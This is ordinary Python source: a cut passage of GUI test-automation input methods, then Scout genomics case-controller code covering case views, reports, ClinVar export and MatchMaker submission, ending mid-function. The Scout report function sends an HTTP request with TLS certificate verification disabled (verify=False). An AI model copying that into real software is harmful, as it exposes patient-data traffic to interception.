    def sendKeyUp(self, keyCode, modifiers=None):
        if modifiers == None:
            command = 'sendKeyUp("%s",[])' % (keyCode,)
        else:
            command = 'sendKeyUp("%s",%s)' % (keyCode, repr(modifiers))
        self._agent.eval_in(self._agent_ns, command)
        return True

    def sendTap(self, x, y, button=None):
        # Screen coordinates are transformed to display coordinates first.
        x, y = self._screenToDisplay(x, y)
        if button == None:
            command = "sendTap(%s, %s)" % (x, y)
        else:
            command = "sendClick(%s, %s, %s)" % (x, y, button)
        self._agent.eval_in(self._agent_ns, command)
        return True

    def sendTouchDown(self, x, y, button=None):
        x, y = self._screenToDisplay(x, y)
        if button == None:
            command = "sendTouchDown(%s, %s)" % (x, y)
        else:
            command = "(sendMouseMove(%s, %s), sendMouseDown(%s))" % (x, y, button)
        self._agent.eval_in(self._agent_ns, command)
        return True

    def sendTouchMove(self, x, y, button=None):
        x, y = self._screenToDisplay(x, y)
        if button == None:
            command = "sendTouchMove(%s, %s)" % (x, y)
        else:
            command = "sendMouseMove(%s, %s, %s)" % (x, y, button)
        self._agent.eval_in(self._agent_ns, command)
        return True

    def sendTouchUp(self, x, y, button=None):
        x, y = self._screenToDisplay(x, y)
        if button == None:
            command = "sendTouchUp(%s, %s)" % (x, y)
        else:
            command = "(sendMouseMove(%s, %s, %s), sendMouseUp(%s))" % (
                x, y, button, button)
        self._agent.eval_in(self._agent_ns, command)
        return True

    def sendPinch(self, *args):
        self.evalPython("touchPinch%s" % (args,))
        return True

    def setScreenToDisplayCoords(self, screenToDisplayFunction):
        # Store the function mapping screen coords -> display input coords.
        self._screenToDisplay = screenToDisplayFunction

    def setDisplayToScreenCoords(self, displayToScreenFunction):
        # Store the function mapping display input coords -> screen coords.
        self._displayToScreen = displayToScreenFunction
class FMBTWindowsError(Exception):
    """Error raised for fmbtwindows-specific failures."""
    pass
|
# -*- coding: utf-8 -*-
import os
import itertools
import requests
import datetime
import logging
from bs4 import BeautifulSoup
from xlsxwriter import Workbook
from flask import url_for, current_app
from flask_mail import Message
import query_phenomizer
from flask_login import current_user
from scout.constants import (CASE_STATUSES, PHENOTYPE_GROUPS, COHORT_TAGS, SEX_MAP, PHENOTYPE_MAP,
CANCER_PHENOTYPE_MAP, VERBS_MAP, MT_EXPORT_HEADER)
from scout.constants.variant_tags import MANUAL_RANK_OPTIONS, DISMISS_VARIANT_OPTIONS, GENETIC_MODELS
from scout.export.variant import export_mt_variants
from scout.server.utils import institute_and_case, user_institutes
from scout.parse.clinvar import clinvar_submission_header, clinvar_submission_lines
from scout.server.blueprints.variant.controllers import variant as variant_decorator
from scout.parse.matchmaker import hpo_terms, omim_terms, genomic_features, parse_matches
from scout.utils.matchmaker import matchmaker_request
from scout.server.blueprints.variant.utils import predictions
from scout.server.blueprints.genes.controllers import gene
LOG = logging.getLogger(__name__)
# Case status -> CSS class; presumably consumed by templates to highlight
# case rows -- verify against the views that render it.
STATUS_MAP = {'solved': 'bg-success', 'archived': 'bg-warning'}
# Case "track" field -> human-readable display label.
TRACKS = {
    'rare': 'Rare Disease',
    'cancer': 'Cancer',
}
def cases(store, case_query, limit=100):
    """Preprocess case objects for the 'cases' view.

    Args:
        store(adapter.MongoAdapter)
        case_query(pymongo.Cursor)
        limit(int): Maximum number of cases to display

    Returns:
        data(dict): includes the cases, how many there are and the limit.
    """
    grouped = dict((status, []) for status in CASE_STATUSES)
    total = 0
    for total, case_obj in enumerate(case_query.limit(limit), 1):
        found_types = {ind['analysis_type'] for ind in case_obj['individuals']}
        LOG.debug("Analysis types found in %s: %s", case_obj['_id'], ','.join(found_types))
        if len(found_types) > 1:
            # Mixed analysis types are collapsed into a single marker.
            LOG.debug("Set analysis types to {'mixed'}")
            found_types = set(['mixed'])
        case_obj['analysis_types'] = list(found_types)
        case_obj['assignees'] = [store.user(email)
                                 for email in case_obj.get('assignees', [])]
        case_obj['is_rerun'] = bool(case_obj.get('analyses', []))
        case_obj['clinvar_variants'] = store.case_to_clinVars(case_obj['_id'])
        case_obj['display_track'] = TRACKS[case_obj.get('track', 'rare')]
        grouped[case_obj['status']].append(case_obj)
    return {
        'cases': [(status, grouped[status]) for status in CASE_STATUSES],
        'found_cases': total,
        'limit': limit,
    }
def case(store, institute_obj, case_obj):
    """Preprocess a single case.

    Prepare the case to be displayed in the case view.

    Args:
        store(adapter.MongoAdapter)
        institute_obj(models.Institute)
        case_obj(models.Case)

    Returns:
        data(dict): case display data (events, suspects, causatives,
            collaborators, phenotype groups, ...). case_obj itself is
            also mutated with display fields.
    """
    # Convert individual information to more readable format
    case_obj['individual_ids'] = []
    for individual in case_obj['individuals']:
        try:
            sex = int(individual.get('sex', 0))
        except ValueError as err:
            # Unparseable sex value: fall back to "unknown" (0).
            sex = 0
        individual['sex_human'] = SEX_MAP[sex]
        # Cancer-track cases use a different phenotype mapping.
        pheno_map = PHENOTYPE_MAP
        if case_obj.get('track', 'rare') == 'cancer':
            pheno_map = CANCER_PHENOTYPE_MAP
        individual['phenotype_human'] = pheno_map.get(individual['phenotype'])
        case_obj['individual_ids'].append(individual['individual_id'])
    case_obj['assignees'] = [store.user(user_email) for user_email in
                             case_obj.get('assignees', [])]
    # Fetch the variant objects for suspects and causatives; fall back to
    # the raw id when the variant is no longer in the database.
    suspects = [store.variant(variant_id) or variant_id for variant_id in
                case_obj.get('suspects', [])]
    causatives = [store.variant(variant_id) or variant_id for variant_id in
                  case_obj.get('causatives', [])]
    # check for partial causatives and associated phenotypes
    partial_causatives = []
    if case_obj.get('partial_causatives'):
        for var_id, values in case_obj['partial_causatives'].items():
            causative_obj = {
                'variant' : store.variant(var_id) or var_id,
                'omim_terms' : values.get('diagnosis_phenotypes'),
                'hpo_terms' : values.get('phenotype_terms')
            }
            partial_causatives.append(causative_obj)
    # Set of all unique genes in the default gene panels
    distinct_genes = set()
    case_obj['panel_names'] = []
    for panel_info in case_obj.get('panels', []):
        if not panel_info.get('is_default'):
            continue
        panel_obj = store.gene_panel(panel_info['panel_name'], version=panel_info.get('version'))
        distinct_genes.update([gene['hgnc_id'] for gene in panel_obj.get('genes', [])])
        full_name = "{} ({})".format(panel_obj['display_name'], panel_obj['version'])
        case_obj['panel_names'].append(full_name)
    case_obj['default_genes'] = list(distinct_genes)
    # Attach an HPO browser link to every phenotype group/term.
    for hpo_term in itertools.chain(case_obj.get('phenotype_groups', []),
                                    case_obj.get('phenotype_terms', [])):
        hpo_term['hpo_link'] = ("http://hpo.jax.org/app/browse/term/{}"
                                .format(hpo_term['phenotype_id']))
    # Build links to the rank model / SV rank model used for this case.
    rank_model_link_prefix = current_app.config.get('RANK_MODEL_LINK_PREFIX')
    if case_obj.get('rank_model_version'):
        # NOTE(review): if RANK_MODEL_LINK_PREFIX is unset this raises
        # TypeError (None + str) -- confirm the config always defines it.
        rank_model_link_postfix = current_app.config.get('RANK_MODEL_LINK_POSTFIX','')
        case_obj['rank_model_link'] = str(rank_model_link_prefix +
                                          case_obj['rank_model_version'] + rank_model_link_postfix)
    sv_rank_model_link_prefix = current_app.config.get('SV_RANK_MODEL_LINK_PREFIX')
    if case_obj.get('sv_rank_model_version'):
        sv_rank_model_link_postfix = current_app.config.get('SV_RANK_MODEL_LINK_POSTFIX','')
        case_obj['sv_rank_model_link'] = str(sv_rank_model_link_prefix +
                                             case_obj['sv_rank_model_version'] + sv_rank_model_link_postfix)
    # other collaborators than the owner of the case
    o_collaborators = []
    for collab_id in case_obj.get('collaborators',[]):
        if collab_id != case_obj['owner'] and store.institute(collab_id):
            o_collaborators.append(store.institute(collab_id))
    case_obj['o_collaborators'] = [(collab_obj['_id'], collab_obj['display_name']) for
                                   collab_obj in o_collaborators]
    # Institutes the case could still be shared with: everyone except
    # cust000, the viewing institute and current collaborators.
    collab_ids = [(collab['_id'], collab['display_name']) for collab in store.institutes() if
                  (collab['_id'] not in ('cust000', institute_obj['_id'])) and
                  (collab['_id'] not in case_obj['collaborators'])]
    events = list(store.events(institute_obj, case=case_obj))
    for event in events:
        # Translate the raw event verb into display text.
        event['verb'] = VERBS_MAP[event['verb']]
    case_obj['clinvar_variants'] = store.case_to_clinVars(case_obj['_id'])
    # if updated_at is a list, set it to the last update datetime
    if case_obj.get('updated_at') and isinstance(case_obj['updated_at'], list):
        case_obj['updated_at'] = max(case_obj['updated_at'])
    # Phenotype groups can be specific for an institute, there are some default groups
    pheno_groups = institute_obj.get('phenotype_groups') or PHENOTYPE_GROUPS
    data = {
        'status_class': STATUS_MAP.get(case_obj['status']),
        'other_causatives': store.check_causatives(case_obj=case_obj),
        'comments': store.events(institute_obj, case=case_obj, comments=True),
        'hpo_groups': pheno_groups,
        'events': events,
        'suspects': suspects,
        'causatives': causatives,
        'partial_causatives' : partial_causatives,
        'collaborators': collab_ids,
        'cohort_tags': COHORT_TAGS,
    }
    return data
def case_report_content(store, institute_obj, case_obj):
    """Gather contents to be visualized in a case report

    Args:
        store(adapter.MongoAdapter)
        institute_obj(models.Institute)
        case_obj(models.Case)

    Returns:
        data(dict)
    """
    # Maps output key (in data) -> the variant key whose presence flags the
    # variant as belonging to that category.
    variant_types = {
        'causatives_detailed': 'causatives',
        'suspects_detailed': 'suspects',
        'classified_detailed': 'acmg_classification',
        'tagged_detailed': 'manual_rank',
        'dismissed_detailed': 'dismiss_variant',
        'commented_detailed': 'is_commented',
    }
    # NOTE(review): data aliases (does not copy) case_obj; the case object
    # is mutated below.
    data = case_obj
    for individual in data['individuals']:
        try:
            sex = int(individual.get('sex', 0))
        except ValueError as err:
            # Unparseable sex value: fall back to "unknown" (0).
            sex = 0
        individual['sex_human'] = SEX_MAP[sex]
        individual['phenotype_human'] = PHENOTYPE_MAP.get(individual['phenotype'])
    # Add the case comments
    data['comments'] = store.events(institute_obj, case=case_obj, comments=True)
    data['manual_rank_options'] = MANUAL_RANK_OPTIONS
    data['dismissed_options'] = DISMISS_VARIANT_OPTIONS
    data['genetic_models'] = dict(GENETIC_MODELS)
    data['report_created_at'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
    evaluated_variants = {vt:[] for vt in variant_types}
    # We collect all causatives and suspected variants.
    # These are handled separately since they are on case level.
    for var_type in ['causatives', 'suspects']:
        # These include references to variants
        vt = '_'.join([var_type, 'detailed'])
        for var_id in case_obj.get(var_type,[]):
            variant_obj = store.variant(var_id)
            if not variant_obj:
                continue
            # If the variant exists we add it to the evaluated variants
            evaluated_variants[vt].append(variant_obj)
    ## get variants for this case that are either classified, commented, tagged or dismissed.
    for var_obj in store.evaluated_variants(case_id=case_obj['_id']):
        # Check which category it belongs to
        for vt in variant_types:
            keyword = variant_types[vt]
            # When found we add it to the category.
            # Each variant can belong to multiple categories.
            if keyword not in var_obj:
                continue
            evaluated_variants[vt].append(var_obj)
    for var_type in evaluated_variants:
        decorated_variants = []
        for var_obj in evaluated_variants[var_type]:
            # We decorate the variant with some extra information
            decorated_info = variant_decorator(
                store=store,
                institute_id=institute_obj['_id'],
                case_name=case_obj['display_name'],
                variant_id=None,
                variant_obj=var_obj,
                add_case=False,
                add_other=False,
                get_overlapping=False,
                add_compounds=False,
                variant_type=var_obj['category'],
                institute_obj=institute_obj,
                case_obj=case_obj,
            )
            decorated_variants.append(decorated_info['variant'])
        # Add the decorated variants to the case
        data[var_type] = decorated_variants
    return data
def coverage_report_contents(store, institute_obj, case_obj, base_url):
    """Post a request to chanjo-report and capture the body of the returned
    response, to be included in the case report.

    Args:
        store(adapter.MongoAdapter)
        institute_obj(models.Institute)
        case_obj(models.Case)
        base_url(str): base url of server

    Returns:
        coverage_data(str): string rendering of the content between
            <body></body> tags of a coverage report
    """
    request_data = {}
    # extract sample ids from case_obj and add them to the post request object
    request_data['sample_id'] = [ind['individual_id'] for ind in case_obj['individuals']]

    # extract default panel names and default genes from case_obj and add them
    # to the post request object
    distinct_genes = set()
    panel_names = []
    for panel_info in case_obj.get('panels', []):
        if panel_info.get('is_default') is False:
            continue
        panel_obj = store.gene_panel(panel_info['panel_name'], version=panel_info.get('version'))
        distinct_genes.update([gene['hgnc_id'] for gene in panel_obj.get('genes', [])])
        full_name = "{} ({})".format(panel_obj['display_name'], panel_obj['version'])
        panel_names.append(full_name)
    # BUGFIX: separator was ' ,' (space before the comma); use ', '
    panel_names = ', '.join(panel_names)

    request_data['gene_ids'] = ','.join([str(gene_id) for gene_id in list(distinct_genes)])
    request_data['panel_name'] = panel_names
    request_data['request_sent'] = datetime.datetime.now()

    # add institute-specific cutoff level to the post request object
    request_data['level'] = institute_obj.get('coverage_cutoff', 15)

    # send POST request to chanjo-report
    # NOTE(review): certificate verification is deliberately disabled here;
    # confirm this is acceptable for the deployment environment
    resp = requests.post(base_url + 'reports/report', data=request_data, verify=False)

    # parse response content; name the parser explicitly to silence the
    # BeautifulSoup "no parser explicitly specified" warning and get
    # deterministic behaviour across environments
    soup = BeautifulSoup(resp.text, 'html.parser')
    # remove links in the printed version of coverage report
    for tag in soup.find_all('a'):
        tag.replaceWith('')
    # extract body content using BeautifulSoup
    coverage_data = ''.join(['%s' % x for x in soup.body.contents])
    return coverage_data
def clinvar_submissions(store, user_id, institute_id):
    """Return all Clinvar submissions for the given user and institute."""
    return list(store.clinvar_submissions(user_id, institute_id))
def clinvar_header(submission_objs, csv_type):
    """Delegate to the clinvar parser: extract the fields required in the
    csv header from the clinvar submission objects."""
    return clinvar_submission_header(submission_objs, csv_type)
def clinvar_lines(clinvar_objects, clinvar_header):
    """Delegate to the clinvar parser: extract the csv lines from the
    clinvar submission objects, ordered according to the given header."""
    return clinvar_submission_lines(clinvar_objects, clinvar_header)
def mt_excel_files(store, case_obj, temp_excel_dir):
    """Collect MT variants and format line of a MT variant report
    to be exported in excel format

    Args:
        store(adapter.MongoAdapter)
        case_obj(models.Case)
        temp_excel_dir(os.Path): folder where the temp excel files are written to

    Returns:
        written_files(int): the number of files written to temp_excel_dir
    """
    today = datetime.datetime.now().strftime('%Y-%m-%d')
    samples = case_obj.get('individuals')
    # fetch every variant on chromosome MT for this case, sorted by position
    # (nr_of_variants=-1 presumably means "no limit" -- confirm in the adapter)
    query = {'chrom':'MT'}
    mt_variants = list(store.variants(case_id=case_obj['_id'], query=query, nr_of_variants= -1, sort_key='position'))
    written_files = 0
    # one excel document is produced per sample in the case
    for sample in samples:
        sample_id = sample['individual_id']
        display_name = sample['display_name']
        # rows restricted to this sample
        sample_lines = export_mt_variants(variants=mt_variants, sample_id=sample_id)
        # set up document name: <case display name>.<sample display name>.<date>.xlsx
        document_name = '.'.join([case_obj['display_name'], display_name, today]) + '.xlsx'
        workbook = Workbook(os.path.join(temp_excel_dir,document_name))
        Report_Sheet = workbook.add_worksheet()
        # Write the column header
        row = 0
        for col,field in enumerate(MT_EXPORT_HEADER):
            Report_Sheet.write(row,col,field)
        # Write variant lines, after header (start at line 1)
        for row, line in enumerate(sample_lines,1): # each line becomes a row in the document
            for col, field in enumerate(line): # each field in line becomes a cell
                Report_Sheet.write(row,col,field)
        workbook.close()
        # count the document only if it actually exists on disk after close
        if os.path.exists(os.path.join(temp_excel_dir,document_name)):
            written_files += 1
    return written_files
def update_synopsis(store, institute_obj, case_obj, user_obj, new_synopsis):
    """Update the case synopsis, creating an event only on an actual change."""
    if case_obj['synopsis'] == new_synopsis:
        # nothing changed -- avoid creating a spurious event
        return
    link = url_for('cases.case', institute_id=institute_obj['_id'],
                   case_name=case_obj['display_name'])
    store.update_synopsis(institute_obj, case_obj, user_obj, link,
                          content=new_synopsis)
def hpo_diseases(username, password, hpo_ids, p_value_treshold=1):
    """Return the list of HGNC symbols that match annotated HPO terms.

    Args:
        username (str): username to use for phenomizer connection
        password (str): password to use for phenomizer connection
        hpo_ids (list(str)): HPO term ids to query with
        p_value_treshold (float): keep only results with p_value at or below this

    Returns:
        query_result: a generator of dictionaries on the form
        {
            'p_value': float,
            'disease_source': str,
            'disease_nr': int,
            'gene_symbols': list(str),
            'description': str,
            'raw_line': str
        }
    """
    # skip querying Phenomizer unless at least one HPO terms exists
    try:
        results = query_phenomizer.query(username, password, *hpo_ids)
        # keep only results at or below the p-value threshold
        diseases = [result for result in results
                    if result['p_value'] <= p_value_treshold]
        return diseases
    except SystemExit:
        # SystemExit is presumably raised by query_phenomizer on failure;
        # report "no result" to the caller instead of terminating
        return None
def rerun(store, mail, current_user, institute_id, case_name, sender, recipient):
    """Request a rerun by email.

    Args:
        store(adapter.MongoAdapter)
        mail(flask_mail.Mail): mail extension used to send the message
        current_user: logged-in user proxy (must expose .email)
        institute_id(str)
        case_name(str)
        sender(str): address used as email sender
        recipient(str): address the rerun request is sent to
    """
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    user_obj = store.user(current_user.email)
    link = url_for('cases.case', institute_id=institute_id, case_name=case_name)
    store.request_rerun(institute_obj, case_obj, user_obj, link)

    # this should send a JSON document to the SuSy API in the future
    # BUGFIX: do not call .encode() on the user name -- formatting a bytes
    # object via str.format renders its repr ("b'...'") into the HTML
    html = """
    <p>{institute}: {case} ({case_id})</p>
    <p>Re-run requested by: {name}</p>
    """.format(institute=institute_obj['display_name'],
               case=case_obj['display_name'], case_id=case_obj['_id'],
               name=user_obj['name'])

    # compose and send the email message
    msg = Message(subject=("SCOUT: request RERUN for {}"
                           .format(case_obj['display_name'])),
                  html=html, sender=sender, recipients=[recipient],
                  # cc the sender of the email for confirmation
                  cc=[user_obj['email']])
    if recipient:
        mail.send(msg)
    else:
        LOG.error("Cannot send rerun message: no recipient defined in config.")
def update_default_panels(store, current_user, institute_id, case_name, panel_ids):
    """Update default panels for a case."""
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    user_obj = store.user(current_user.email)
    link = url_for('cases.case', institute_id=institute_id, case_name=case_name)
    # resolve each panel id to its panel object before handing off to the store
    panel_objs = []
    for panel_id in panel_ids:
        panel_objs.append(store.panel(panel_id))
    store.update_default_panels(institute_obj, case_obj, user_obj, link, panel_objs)
def update_clinical_filter_hpo(store, current_user, institute_id, case_name, hpo_clinical_filter):
    """Update HPO clinical filter use for a case."""
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    author = store.user(current_user.email)
    case_link = url_for('cases.case', institute_id=institute_id, case_name=case_name)
    store.update_clinical_filter_hpo(institute_obj, case_obj, author, case_link,
                                     hpo_clinical_filter)
def vcf2cytosure(store, institute_id, case_name, individual_id):
    """vcf2cytosure CGH file for individual.

    Args:
        store(adapter.MongoAdapter)
        institute_id(str)
        case_name(str)
        individual_id(str)

    Returns:
        (display_name, vcf2cytosure): display name and CGH file path of the
            matching individual

    Raises:
        ValueError: if the individual is not part of the case
    """
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    individual_obj = None
    for individual in case_obj['individuals']:
        if individual['individual_id'] == individual_id:
            individual_obj = individual
            break  # found the match; no need to keep scanning
    # BUGFIX: the original left individual_obj unbound (obscure NameError)
    # when no individual matched; fail with an explicit error instead
    if individual_obj is None:
        raise ValueError(
            "individual {} not found in case {}".format(individual_id, case_name))
    return (individual_obj['display_name'], individual_obj['vcf2cytosure'])
def gene_variants(store, variants_query, institute_id, page=1, per_page=50):
    """Pre-process list of variants.

    Args:
        store(adapter.MongoAdapter)
        variants_query: mongo cursor over variants (supports count/skip/limit)
        institute_id(str)
        page(int): 1-based page number
        per_page(int): page size

    Returns:
        dict with 'variants' (decorated variant dicts for this page) and
        'more_variants' (bool, True if further pages exist)
    """
    # We need to call variants_collection.count_documents here
    variant_count = variants_query.count()
    skip_count = per_page * max(page - 1, 0)
    more_variants = variant_count > (skip_count + per_page)
    variant_res = variants_query.skip(skip_count).limit(per_page)

    my_institutes = list(inst['_id'] for inst in user_institutes(store, current_user))
    variants = []
    for variant_obj in variant_res:
        # hide other institutes for now
        if variant_obj['institute'] not in my_institutes:
            LOG.warning("Institute {} not allowed.".format(variant_obj['institute']))
            continue

        # Populate variant case_display_name
        variant_case_obj = store.case(case_id=variant_obj['case_id'])
        if not variant_case_obj:
            # A variant with missing case was encountered
            continue
        variant_obj['case_display_name'] = variant_case_obj.get('display_name')

        genome_build = variant_case_obj.get('genome_build', '37')
        if genome_build not in ['37', '38']:
            genome_build = '37'

        # Update the HGNC symbols if they are not set
        variant_genes = variant_obj.get('genes')
        if variant_genes is not None:
            for gene_obj in variant_genes:
                # If there is no hgnc id there is nothing we can do
                if not gene_obj['hgnc_id']:
                    continue
                # Else we collect the gene object and check the id
                if gene_obj.get('hgnc_symbol') is None or gene_obj.get('description') is None:
                    hgnc_gene = store.hgnc_gene(gene_obj['hgnc_id'], build=genome_build)
                    if not hgnc_gene:
                        continue
                    gene_obj['hgnc_symbol'] = hgnc_gene['hgnc_symbol']
                    gene_obj['description'] = hgnc_gene['description']

        # Populate variant HGVS and predictions
        gene_ids = []
        gene_symbols = []
        hgvs_c = []
        hgvs_p = []
        if variant_genes is not None:
            for gene_obj in variant_genes:
                hgnc_id = gene_obj['hgnc_id']
                gene_symbol = gene(store, hgnc_id)['symbol']
                gene_ids.append(hgnc_id)
                gene_symbols.append(gene_symbol)

                # BUGFIX: initialize BOTH defaults -- hgvs_protein was
                # previously unbound (NameError) when the gene had no
                # canonical transcript
                hgvs_nucleotide = '-'
                hgvs_protein = '-'
                # gather HGVS info from gene transcripts; guard against a
                # missing 'transcripts' key (was a TypeError on None)
                transcripts_list = gene_obj.get('transcripts') or []
                for transcript_obj in transcripts_list:
                    if transcript_obj.get('is_canonical') is True:
                        hgvs_nucleotide = str(transcript_obj.get('coding_sequence_name'))
                        hgvs_protein = str(transcript_obj.get('protein_sequence_name'))
                hgvs_c.append(hgvs_nucleotide)
                hgvs_p.append(hgvs_protein)

            if len(gene_symbols) == 1:
                # prefer protein-level HGVS, fall back to coding, then '-'
                if hgvs_p[0] != "None":
                    hgvs = hgvs_p[0]
                elif hgvs_c[0] != "None":
                    hgvs = hgvs_c[0]
                else:
                    hgvs = "-"
                variant_obj['hgvs'] = hgvs

            # populate variant predictions for display
            variant_obj.update(predictions(variant_genes))

        variants.append(variant_obj)

    return {
        'variants': variants,
        'more_variants': more_variants,
    }
def multiqc(store, institute_id, case_name):
    """Find MultiQC report for the case."""
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    data = {
        'institute': institute_obj,
        'case': case_obj,
    }
    return data
def get_sanger_unevaluated(store, institute_id, user_id):
    """Get all variants for an institute having Sanger validations ordered but still not evaluated

    Args:
        store(scout.adapter.MongoAdapter)
        institute_id(str)
        user_id(str)

    Returns:
        unevaluated: a list that looks like this: [ {'case1': [varID_1, varID_2, .., varID_n]}, {'case2' : [varID_1, varID_2, .., varID_n]} ],
        where the keys are case display names and the values are lists of
        variants with Sanger ordered but not yet validated
    """
    # Retrieve a list of ids for variants with Sanger ordered grouped by case from the 'event' collection
    # This way is much faster than querying over all variants in all cases of an institute
    sanger_ordered_by_case = store.sanger_ordered(institute_id, user_id)
    unevaluated = []

    # for each object where key==case and value==[variant_id with Sanger ordered]
    for item in sanger_ordered_by_case:
        case_id = item['_id']
        # Get the case to collect display name
        case_obj = store.case(case_id=case_id)
        if not case_obj: # the case might have been removed
            continue
        case_display_name = case_obj.get('display_name')

        # List of variant document ids
        varid_list = item['vars']
        unevaluated_by_case = {}
        unevaluated_by_case[case_display_name] = []
        for var_id in varid_list:
            # For each variant with sanger validation ordered
            variant_obj = store.variant(document_id=var_id, case_id=case_id)
            # Double check that Sanger was ordered (and not canceled) for the variant
            if variant_obj is None or variant_obj.get('sanger_ordered') is None or variant_obj.get('sanger_ordered') is False:
                continue
            validation = variant_obj.get('validation', 'not_evaluated')
            # Check that the variant is not evaluated
            if validation in ['True positive', 'False positive']:
                continue
            unevaluated_by_case[case_display_name].append(variant_obj['_id'])

        # If for a case there is at least one Sanger validation to evaluate add the object to the unevaluated objects list
        if len(unevaluated_by_case[case_display_name]) > 0:
            unevaluated.append(unevaluated_by_case)
    return unevaluated
def mme_add(store, user_obj, case_obj, add_gender, add_features, add_disorders, genes_only,
            mme_base_url, mme_accepts, mme_token):
    """Add a patient to MatchMaker server

    Args:
        store(adapter.MongoAdapter)
        user_obj(dict) a scout user object (to be added as matchmaker contact)
        case_obj(dict) a scout case object
        add_gender(bool) if True case gender will be included in matchmaker
        add_features(bool) if True HPO features will be included in matchmaker
        add_disorders(bool) if True OMIM diagnoses will be included in matchmaker
        genes_only(bool) if True only genes and not variants will be shared
        mme_base_url(str) base url of the MME server
        mme_accepts(str) request content accepted by MME server
        mme_token(str) auth token of the MME server

    Returns:
        submitted_info(dict) info submitted to MatchMaker and its responses;
            note: a plain error string is returned instead when the
            connection parameters are missing
    """
    # all three connection parameters are required
    if not mme_base_url or not mme_accepts or not mme_token:
        return 'Please check that Matchmaker connection parameters are valid'
    url = ''.join([mme_base_url, '/patient/add'])

    features = [] # this is the list of HPO terms
    disorders = [] # this is the list of OMIM diagnoses
    g_features = []

    # create contact dictionary
    contact_info = {
        'name' : user_obj['name'],
        'href' : ''.join( ['mailto:',user_obj['email']] ),
        'institution' : 'Scout software user, Science For Life Laboratory, Stockholm, Sweden'
    }
    if add_features: # create features dictionaries
        features = hpo_terms(case_obj)
    if add_disorders: # create OMIM disorders dictionaries
        disorders = omim_terms(case_obj)

    # send a POST request and collect response for each affected individual in case
    server_responses = []
    submitted_info = {
        'contact' : contact_info,
        'sex' : add_gender,
        'features' : features,
        'disorders' : disorders,
        'genes_only' : genes_only,
        'patient_id' : []
    }
    for individual in case_obj.get('individuals'):
        if not individual['phenotype'] in [2, 'affected']: # include only affected individuals
            continue
        patient = {
            'contact' : contact_info,
            'id' : '.'.join([case_obj['_id'], individual.get('individual_id')]), # This is a required field form MME
            'label' : '.'.join([case_obj['display_name'], individual.get('display_name')]),
            'features' : features,
            'disorders' : disorders
        }
        if add_gender:
            # NOTE(review): assumes sex is stored as the *string* '1' for males
            # here, while other code paths parse it as an int -- confirm the
            # upstream representation
            if individual['sex'] == '1':
                patient['sex'] = 'MALE'
            else:
                patient['sex'] = 'FEMALE'
        if case_obj.get('suspects'):
            g_features = genomic_features(store, case_obj, individual.get('display_name'), genes_only)
            patient['genomicFeatures'] = g_features
        # send add request to server and capture response
        resp = matchmaker_request(url=url, token=mme_token, method='POST', content_type=mme_accepts,
                                  accept='application/json', data={'patient':patient})
        server_responses.append({
            'patient': patient,
            'message': resp.get('message'),
            'status_code' : resp.get('status_code')
        })
    submitted_info['server_responses'] = server_responses
    return submitted_info
def mme_delete(case_obj, mme_base_url, mme_token):
    """Delete all affected samples for a case from MatchMaker

    Args:
        case_obj(dict) a scout case object
        mme_base_url(str) base url of the MME server
        mme_token(str) auth token of the MME server

    Returns:
        server_responses(list): one dict per patient with keys
            'patient_id', 'message' and 'status_code';
            a plain error string when connection parameters are missing
    """
    # both connection parameters are required
    if not mme_base_url or not mme_token:
        return 'Please check that Matchmaker connection parameters are valid'

    server_responses = []
    # issue one DELETE request per patient previously submitted for this case
    for patient in case_obj['mme_submission']['patients']:
        pat_id = patient['id']
        delete_url = ''.join([mme_base_url, '/patient/delete/', pat_id])
        resp = matchmaker_request(url=delete_url, token=mme_token, method='DELETE')
        server_responses.append({
            'patient_id': pat_id,
            'message': resp.get('message'),
            'status_code': resp.get('status_code'),
        })
    return server_responses
def mme_matches(case_obj, institute_obj, mme_base_url, mme_token):
    """Show Matchmaker submission data for a sample and eventual matches.

    Args:
        case_obj(dict): a scout case object
        institute_obj(dict): an institute object
        mme_base_url(str) base url of the MME server
        mme_token(str) auth token of the MME server

    Returns:
        data(dict): data to display in the html template, or None when the
            case has no MatchMaker submission
    """
    data = {
        'institute' : institute_obj,
        'case' : case_obj,
        'server_errors' : []
    }
    matches = {}
    # loop over the submitted samples and get matches from the MatchMaker server
    if not case_obj.get('mme_submission'):
        return None
    for patient in case_obj['mme_submission']['patients']:
        patient_id = patient['id']
        matches[patient_id] = None
        url = ''.join([ mme_base_url, '/matches/', patient_id])
        server_resp = matchmaker_request(url=url, token=mme_token, method='GET')
        if 'status_code' in server_resp: # the server returned a valid response
            # and this will be a list of match objects sorted by desc date
            pat_matches = []
            if server_resp.get('matches'):
                pat_matches = parse_matches(patient_id, server_resp['matches'])
            matches[patient_id] = pat_matches
        else:
            # no status code -> the request itself failed; surface the error
            LOG.warning('Server returned error message: {}'.format(server_resp['message']))
            data['server_errors'].append(server_resp['message'])
    data['matches'] = matches
    return data
def mme_match(case_obj, match_type, mme_base_url, mme_token, nodes=None, mme_accepts=None):
    """Initiate a MatchMaker match against either other Scout patients or external nodes

    Args:
        case_obj(dict): a scout case object already submitted to MME
        match_type(str): 'internal', 'external', or a specific external node id
        mme_base_url(str): base url of the MME server
        mme_token(str): auth token of the MME server
        nodes(list(dict)): known external nodes (each with an 'id' key);
            used only for external matching
        mme_accepts(str): request content accepted by MME server (only for internal matches)

    Returns:
        server_responses(list): one response dict per request sent
    """
    query_patients = []
    server_responses = []
    url = None
    # list of patient dictionaries is required for internal matching
    query_patients = case_obj['mme_submission']['patients']
    if match_type=='internal':
        url = ''.join([mme_base_url,'/match'])
        for patient in query_patients:
            json_resp = matchmaker_request(url=url, token=mme_token, method='POST',
                                           content_type=mme_accepts, accept=mme_accepts, data={'patient':patient})
            resp_obj = {
                'server' : 'Local MatchMaker node',
                'patient_id' : patient['id'],
                'results' : json_resp.get('results'),
                'status_code' : json_resp.get('status_code'),
                'message' : json_resp.get('message') # None if request was successful
            }
            server_responses.append(resp_obj)
    else: # external matching
        # external matching requires only patient ID
        query_patients = [ patient['id'] for patient in query_patients]
        node_ids = [ node['id'] for node in nodes ]
        if match_type in node_ids: # match is against a specific external node
            node_ids = [match_type]
        # Match every affected patient
        for patient in query_patients:
            # Against every node
            for node in node_ids:
                url = ''.join([mme_base_url,'/match/external/', patient, '?node=', node])
